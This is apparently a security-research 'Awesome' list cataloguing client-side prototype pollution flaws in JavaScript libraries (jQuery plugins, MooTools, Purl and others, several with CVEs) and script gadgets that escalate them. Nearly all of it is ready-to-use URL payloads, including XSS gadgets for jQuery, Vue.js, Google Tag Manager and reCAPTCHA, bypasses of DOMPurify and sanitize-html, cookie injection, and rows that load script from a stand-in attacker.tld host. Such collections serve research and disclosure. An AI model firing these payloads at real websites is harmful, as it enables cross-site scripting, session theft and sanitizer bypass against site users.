Awesome
Client-Side Prototype Pollution
Intro
If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski
In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.
Prototype Pollution
| Name | Payload | Refs | Found by |
|---|---|---|---|
| Wistia Embedded Video (Fixed) | ?__proto__[test]=test<br>?__proto__.test=test | [1] | William Bowling |
| jQuery query-object plugin<br>CVE-2021-20083 | ?__proto__[test]=test<br>#__proto__[test]=test | Sergey Bobrov | |
| jQuery Sparkle<br>CVE-2021-20084 | ?__proto__.test=test<br>?constructor.prototype.test=test | Sergey Bobrov | |
| V4Fire Core Library | ?__proto__.test=test<br>?__proto__[test]=test<br>?__proto__[test]={"json":"value"} | Sergey Bobrov | |
| backbone-query-parameters<br>CVE-2021-20085 | ?__proto__.test=test<br>?constructor.prototype.test=test<br>?__proto__.array=1|2|3 | [1] | Sergey Bobrov |
| jQuery BBQ<br>CVE-2021-20086 | ?__proto__[test]=test<br>?constructor[prototype][test]=test | Sergey Bobrov | |
| jquery-deparam<br>CVE-2021-20087 | ?__proto__[test]=test<br>?constructor[prototype][test]=test | Sergey Bobrov | |
| MooTools More<br>CVE-2021-20088 | ?__proto__[test]=test<br>?constructor[prototype][test]=test | Sergey Bobrov | |
| Swiftype Site Search (Fixed) | #__proto__[test]=test | [1] | s1r1us |
| CanJS deparam | ?__proto__[test]=test<br>?constructor[prototype][test]=test | Rahul Maini | |
| Purl (jQuery-URL-Parser)<br>CVE-2021-20089 | ?__proto__[test]=test<br>?constructor[prototype][test]=test<br>#__proto__[test]=test | Sergey Bobrov | |
| HubSpot Tracking Code (Fixed) | ?__proto__[test]=test<br>?constructor[prototype][test]=test<br>#__proto__[test]=test | Sergey Bobrov | |
| YUI 3 querystring-parse | ?constructor[prototype][test]=test | Sergey Bobrov | |
| Mutiny (Fixed) | ?__proto__.test=test | SPQR | |
| jQuery parseParams | ?__proto__.test=test<br>?constructor.prototype.test=test | POSIX | |
| php.js parse_str | ?__proto__[test]=test<br>?constructor[prototype][test]=test | POSIX | |
| arg.js | ?__proto__[test]=test<br>?__proto__.test=test<br>?constructor[prototype][test]=test<br>#__proto__[test]=test | POSIX | |
| davis.js | ?__proto__[test]=test | POSIX | |
| Component querystring | ?__proto__[NUMBER]=test<br>?__proto__[123]=test | Masato Kinugawa | |
| Aurelia path | ?__proto__[test]=test | [1] | s1r1us |
| analytics-utils < 1.0.3 | ?__proto__[test]=test<br>?constructor[prototype][test]=test | [1] | alexdaviestray |
Script Gadgets
| Name | Payload | Impact | Refs | Found by |
|---|---|---|---|---|
| Wistia Embedded Video | ?__proto__[innerHTML]=<img/src/onerror%3dalert(1)> | XSS | [1] | William Bowling |
| jQuery $.get | ?__proto__[context]=<img/src/onerror%3dalert(1)><br>&__proto__[jquery]=x | XSS | Sergey Bobrov | |
| jQuery $.get >= 3.0.0<br>Boolean.prototype | ?__proto__[url][]=data:,alert(1)//<br>&__proto__[dataType]=script | XSS | Michał Bentkowski | |
| jQuery $.get >= 3.0.0<br>Boolean.prototype | ?__proto__[url]=data:,alert(1)//<br>&__proto__[dataType]=script<br>&__proto__[crossDomain]= | XSS | Sergey Bobrov | |
| jQuery $.getScript >= 3.4.0 | ?__proto__[src][]=data:,alert(1)// | XSS | s1r1us | |
| jQuery $.getScript 3.0.0 - 3.3.1<br>Boolean.prototype | ?__proto__[url]=data:,alert(1)// | XSS | s1r1us | |
| jQuery $(html) | ?__proto__[div][0]=1<br>&__proto__[div][1]=<img/src/onerror%3dalert(1)> | XSS | Sergey Bobrov | |
| jQuery $(x).off<br>String.prototype | ?__proto__[preventDefault]=x<br>&__proto__[handleObj]=x<br>&__proto__[delegateTarget]=<img/src/onerror%3dalert(1)> | XSS | Sergey Bobrov | |
| jQuery $(x).attr | ?__proto__[OnError]=alert(1)<br>&__proto__[SRC]=fakeimagewontload.jpg | XSS | [1] [2] | Johan Carlsson |
| jQuery <span>$</span>(x).on, <span>$</span>(x).submit | ?__proto__[handler][]=x<br>&__proto__[selector][]=<img/src/onerror%3Dalert(1)><br>&__proto__[focus]=x<br>&__proto__[needsContext]=x | XSS | [1] | Johan Carlsson |
| Google reCAPTCHA | ?__proto__[srcdoc][]=<script>alert(1)</script> | XSS | s1r1us | |
| Twitter Universal Website Tag (Fixed) | ?__proto__[hif][]=javascript:alert(1) | XSS | Sergey Bobrov | |
| Tealium Universal Tag | ?__proto__[attrs][src]=1<br>&__proto__[src]=data:,alert(1)// | XSS | Sergey Bobrov | |
| Akamai Boomerang | ?__proto__[BOOMR]=1<br>&__proto__[url]=//attacker.tld/js.js | XSS | s1r1us | |
| Lodash <= 4.17.15 | ?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1) | XSS | [1] | Alex Brasetvik |
| sanitize-html | ?__proto__[*][]=onload | Bypass | [1] | Michał Bentkowski |
| sanitize-html | ?__proto__[innerText]=<script>alert(1)</script> | Bypass | [1] | Hpdoger |
| js-xss | ?__proto__[whiteList][img][0]=onerror<br>&__proto__[whiteList][img][1]=src | Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | ?__proto__[ALLOWED_ATTR][0]=onerror<br>&__proto__[ALLOWED_ATTR][1]=src | Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | ?__proto__[documentMode]=9 | Bypass | [1] | Michał Bentkowski |
| Google Closure | ?__proto__[*%20ONERROR]=1<br>&__proto__[*%20SRC]=1 | Bypass | [1] | Michał Bentkowski |
| Google Closure | ?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)// | XSS | [1] | Michał Bentkowski |
| Marionette.js / Backbone.js | ?__proto__[tagName]=img<br>&__proto__[src][]=x:<br>&__proto__[onerror][]=alert(1) | XSS | Sergey Bobrov | |
| Adobe Dynamic Tag Management | ?__proto__[src]=data:,alert(1)// | XSS | Sergey Bobrov | |
| Adobe Dynamic Tag Management | ?__proto__[SRC]=<img/src/onerror%3dalert(1)> | XSS | Sergey Bobrov | |
| Swiftype Site Search | ?__proto__[xxx]=alert(1) | XSS | s1r1us | |
| Embedly Cards | ?__proto__[onload]=alert(1) | XSS | Guilherme Keerok | |
| Segment Analytics.js | ?__proto__[script][0]=1<br>&__proto__[script][1]=<img/src/onerror%3dalert(1)> | XSS | Sergey Bobrov | |
| Knockout.js<br>Array.prototype | ?__proto__[4]=a':1,[alert(1)]:1,'b<br>&__proto__[5]=, | XSS | Michał Bentkowski | |
| Zepto.js | ?__proto__[onerror]=alert(1) | XSS | [1] | lih3iu |
| Zepto.js | ?__proto__[html]=<img/src/onerror%3dalert(1)> | XSS | Sergey Bobrov | |
| Sprint.js | ?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)> | XSS | [1] | lih3iu |
| Vue.js | ?__proto__[v-if]=_c.constructor('alert(1)')() | XSS | POSIX | |
| Vue.js | ?__proto__[attrs][0][name]=src<br>&__proto__[attrs][0][value]=xxx<br>&__proto__[xxx]=data:,alert(1)//<br>&__proto__[is]=script | XSS | [1] | s1r1us |
| Vue.js | ?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')() | XSS | [1] | r00timentary |
| Vue.js | ?__proto__[data]=a<br>&__proto__[template][nodeType]=a<br>&__proto__[template][innerHTML]=<script>alert(1)</script> | XSS | [1] | SuperGuesser |
| Vue.js | ?__proto__[props][][value]=a<br>&__proto__[name]=":''.constructor.constructor('alert(1)')()," | XSS | [1] | st98_ |
| Vue.js | ?__proto__[template]=<script>alert(1)</script> | XSS | [1] | huli |
| Demandbase Tag | ?__proto__[Config][SiteOptimization][enabled]=1<br>&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php? | XSS | SPQR | |
| @analytics/google-tag-manager | ?__proto__[customScriptSrc]=//attacker.tld/xss.js | XSS | SPQR | |
| i18next | ?__proto__[lng]=cimode<br>&__proto__[appendNamespaceToCIMode]=x<br>&__proto__[nsSeparator]=<img/src/onerror%3dalert(1)> | Potential XSS | Sergey Bobrov | |
| i18next < 19.8.5 | ?__proto__[lng]=a<br>&__proto__[a]=b<br>&__proto__[obj]=c<br>&__proto__[k]=d<br>&__proto__[d]=<img/src/onerror%3dalert(1)> | Potential XSS | Sergey Bobrov | |
| i18next >= 19.8.5 | ?__proto__[lng]=a<br>&__proto__[key]=<img/src/onerror%3dalert(1)> | Potential XSS | Sergey Bobrov | |
| Google Analytics | ?__proto__[cookieName]=COOKIE%3DInjection%3B | Cookie Injection | Sergey Bobrov | |
| Popper.js | ?__proto__[arrow][style]=color:red;transition:all%201s<br>&__proto__[arrow][ontransitionend]=alert(1)<br><br>?__proto__[reference][style]=color:red;transition:all%201s<br>&__proto__[reference][ontransitionend]=alert(2)<br><br>?__proto__[popper][style]=color:red;transition:all%201s<br>&__proto__[popper][ontransitionend]=alert(3) | XSS | [1] [2] | Matheus Vrech |
| Pendo Agent | ?__proto__[dataHost]=attacker.tld/js.js%23 | XSS | Renwa | |
| script.aculo.us<br>String.constructor | ?x=x<br>&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)> | XSS | Sergey Bobrov | |
| hCaptcha (Fixed) | ?__proto__[assethost]=javascript:alert(1)// | XSS | Masato Kinugawa | |
| Google Closure | ?__proto__[trustedTypes]=x<br>&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)> | XSS | Mathias Karlsson | |
| Google Tag Manager | ?__proto__[vtp_enableRecaptcha]=1<br>&__proto__[srcdoc]=<script>alert(1)</script> | XSS | terjanq | |
| Google Tag Manager | ?__proto__[q][0][0]=require<br>&__proto__[q][0][1]=x<br>&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7 | XSS | Sergey Bobrov /<br>Masato Kinugawa | |
| Google Analytics | ?__proto__[q][0][0]=require<br>&__proto__[q][0][1]=x<br>&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7 | XSS | Sergey Bobrov /<br>Masato Kinugawa |